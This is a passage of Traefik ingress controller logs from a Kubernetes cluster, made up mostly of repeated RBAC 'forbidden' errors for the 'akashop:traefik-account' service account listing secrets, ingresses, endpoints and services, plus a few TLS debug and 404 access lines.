in API group "" at the cluster scope +W0330 07:01:59.777273 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:01:59.777313 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:02:07.026264 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:02:07.026301 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:02:33.017989 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:02:33.018040 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:02:40.994191 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:02:40.994271 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:02:41.931976 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:02:41.932061 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:02:46.500658 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:02:46.500690 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:03:13.098165 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:03:13.098207 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:03:27.280635 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:03:27.280682 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:03:27.916314 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:03:27.916344 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:03:43.683852 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:03:43.683887 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:04:01.092993 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:04:01.093080 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:04:08.689658 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:04:08.689687 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:04:22.985441 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:04:22.985557 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:04:38.318309 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:04:38.318359 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:04:48.936166 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:04:48.936262 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:04:51.068471 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:04:51.068569 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:05:04.241614 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:05:04.241774 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:05:26.394644 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:05:26.394678 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:05:30.895316 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:05:30.895349 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:05:31.503345 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:05:31.503383 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:05:52.788749 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:05:52.788853 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:06:06.355550 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:06:06.355588 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:06:09.446859 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:06:09.446890 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:06:26.292403 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:06:26.292451 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:06:42.264193 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:06:42.264240 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:06:48.621441 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:06:48.621474 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:06:51.941038 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:06:51.941124 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:07:03.266260 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:07:03.266399 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +time="2024-03-30T07:07:13Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T07:07:13Z" level=debug msg="http: TLS handshake error from 10.2.1.1:61913: remote error: tls: unknown certificate" +10.0.0.4 - - [30/Mar/2024:07:07:13 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:07:13 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 2 "-" "-" 0ms +W0330 07:07:27.779112 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:07:27.779227 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:07:31.194674 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:07:31.194704 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:07:41.798336 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:07:41.798380 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:07:48.072360 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:07:48.072477 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:08:08.620472 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:08:08.620500 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:08:09.634840 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:08:09.634869 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:08:14.381662 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:08:14.381718 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:08:24.980280 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:08:24.980310 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:08:44.191864 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:08:44.191921 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:08:50.204752 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:08:50.204786 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:09:02.787320 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:09:02.787365 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:09:11.802847 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:09:11.802883 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:09:16.212901 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:09:16.212931 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:09:33.086170 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:09:33.086197 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:09:39.448843 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:09:39.448885 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:09:50.107851 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:09:50.107947 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:10:06.667343 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:10:06.667422 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:10:24.563770 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:10:24.563803 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:10:29.077340 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:10:29.077374 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:10:37.380098 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:10:37.380131 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:10:46.739273 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:10:46.739308 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:11:07.322145 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:11:07.322169 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:11:11.096333 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:11:11.096511 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:11:12.822563 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:11:12.822650 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:11:39.683917 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:11:39.684046 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 07:11:52.793924 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:11:52.793964 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 07:11:55.920154 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:11:55.920190 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:11:56.136119 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:11:56.136206 1 reflector.go:140] 